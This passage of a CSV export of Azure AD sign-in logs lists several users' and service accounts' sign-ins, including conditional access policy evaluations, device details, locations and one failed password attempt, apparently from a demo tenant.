'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6382c33b-18b0-46b9-982e-4aa9a1a20f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa9a1a20f00,SigninLogs,Sucess,33.7984581,-84.38828278
+191,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d6b9e5c3-0221-4542-93eb-e6f46684e35e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4c926580-a7d1-4f3d-971f-7f0b20011b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4c926580-a7d1-4f3d-971f-7f0b20011b00,SigninLogs,Sucess,36.6404686,-78.26995087
+192,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:10.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,55d5dd3f-42a7-4f44-89be-dd19d82bb6d6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f60596550e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f60596550e00,SigninLogs,Sucess,36.6404686,-78.26995087
+193,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:40.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,c23e9762-ecae-4491-948b-01668c6ecfc2,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,[],notApplied,09/04/2020 15:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",8a945db4-b61d-4e46-b881-75d823f01600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d823f01600,SigninLogs,Failed,35.01296997,-80.93171692
+194,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5a2823ca-1e3f-49f7-bb7b-c121a1f5b81c,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",3108dc47-edad-48bc-88bb-75cec1df1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3108dc47-edad-48bc-88bb-75cec1df1700,SigninLogs,Sucess,35.01296997,-80.93171692
+195,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0823479f-60ad-0000-54b3-364aca3e7be0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",17ea6265-ad23-4765-8c42-0b9f0ba11b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,17ea6265-ad23-4765-8c42-0b9f0ba11b00,SigninLogs,Sucess,33.7984581,-84.38828278
+196,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b78d9e1400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,669c457e-4441-4eab-88a8-07b78d9e1400,SigninLogs,Sucess,33.0175209,35.44601059
+197,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:21.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2561d73c-277a-4388-879d-0ea5074a8a4a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc0423c1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,dfda3bbc-b55b-4a89-a1fb-2fc0423c1300,SigninLogs,Sucess,33.7984581,-84.38828278
+198,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:17.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ecb4ce6-c9bb-4733-93d9-f57dd5146677,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d8f2651c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c27bb27f-6b5f-4aa7-85e4-b0d8f2651c00,SigninLogs,Sucess,33.7984581,-84.38828278
